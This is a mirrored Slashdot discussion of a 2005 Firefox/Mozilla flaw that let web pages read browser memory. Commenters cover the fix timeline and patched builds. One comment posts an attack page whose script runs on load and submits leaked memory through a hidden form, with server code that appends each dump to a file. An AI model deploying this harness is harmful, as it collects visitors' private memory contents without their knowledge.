Slashdot Mirror


Mozilla / Firefox Memory Exposure Vulnerability

JimmyM writes "Secunia has a story regarding a new severe vulnerability in the Mozilla Suite and Firefox browser, which can be exploited by any web site to read all memory, which the browser process has access to. No patch is available from Mozilla. A demonstration is available here."

6 of 132 comments

  1. Re:Confusing write-up by cjsnell · Score: 5, Informative

    Can a remote site actually get access to this information, or is it only displayable on the screen?

    The data is being displayed within a TEXTAREA box, so it's probably as simple as adding an onClick="javascript:document.form.submit();" (or onMouseOver, etc.) to the document.

    Yes, this is very dangerous.

  2. Re:Did the Mozilla/Firefox guys ignore a warning? by Vaevictis666 · Score: 5, Informative

    From the bugzilla bug report (copy it, they disallow /. links):

    Opened: 2005-04-01 13:40 PDT
    Last modified: 2005-04-01 22:39 PDT
    Resolution: FIXED

    So yes they did, it was fixed in under 10 hours, and published 3 days later.

  3. Re:Did the Mozilla/Firefox guys ignore a warning? by Anonymous Coward · Score: 3, Informative

    You can try the 1.0.3 release candidate, in which this bug is fixed, and which is due to be rolled out very soon. See here for download links.

  4. Ok, confirmed by cjsnell · Score: 4, Informative

    You can write a nasty little page that continuously dumps the 10k bytes of memory data to a file on your server. Here's an example that uses an HTML::Mason page to do this:

    <HTML>
    <HEAD>
    <TITLE>Nasty Demo</TITLE>
    </HEAD>
    <BODY BGCOLOR='#FFFFFF' COLOR='#222222' onLoad="readMemory();">
    <SCRIPT language="JavaScript">
    function genGluck(str){
        var x = str;
        var rx=/end/i;
        x = x.replace(rx,function($1){
            $1.match(rx);
            return "";
        });
        x = x.replace(/^end/,"");
        return x;
    }

    function readMemory()
    {
        // First piece of readMemory() removed to satisfy Slashdot crapfilter
        // (the removed part is what fills the variable 'mem')

        // Keep only printable characters so the dump survives the form POST
        mem = mem.replace(/[^\.\\\:\/\'\(\)\"\_\?\=\%\&\;\#\@\- a-zA-Z0-9]+/g, " ");

        document.nasty.result.value = mem;

        document.nasty.submit();
    }
    </SCRIPT>
    <FORM METHOD=POST NAME='nasty'>
    <INPUT NAME=result TYPE=HIDDEN VALUE='' onClick='readMemory();'>
    </FORM>
    <BR><BR>
    </BODY>
    </HTML>

    <%args>
    $result => ''
    </%args>
    <%init>
    # Append the POSTed dump to a file on the server (filehandle comes first in Perl's print)
    open(OUTFILE,'>>/tmp/outfile');
    print OUTFILE $result;
    close(OUTFILE);
    </%init>
  5. Download the latest patched version right here by OmegaGX · Score: 3, Informative

    Download the latest patched version right here: http://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/latest-trunk/firefox-1.0+.en-US.win32.installer.exe
    I just used it and I am not vulnerable: all I see are lots of X's just like in IE.

  6. Re:I'm shocked! by NanoGator · Score: 3, Informative

    "Is Mozilla actually more secure? Or is it just as bad as any other piece of software?"

    It's a commonly held belief that Microsoft programmers come from Elbonia. Once it is accepted that Mozilla programmers are just as Elbonian as MS programmers, the security zealotry will die down.

    (Disclaimer 1: This post does not say that Mozilla is less secure (or more secure, for that matter) than IE. This post does not say that Mozilla programmers are incompetent. This post does address zealotry and nothing else.)

    (Disclaimer 2: It really fucking pisses me off that I have to write this stupid disclaimer because lots of people with mod-points will not accept anything that's even remotely negative about Mozilla. Learn how to take criticism before dispensing it.)

    --
    "Derp de derp."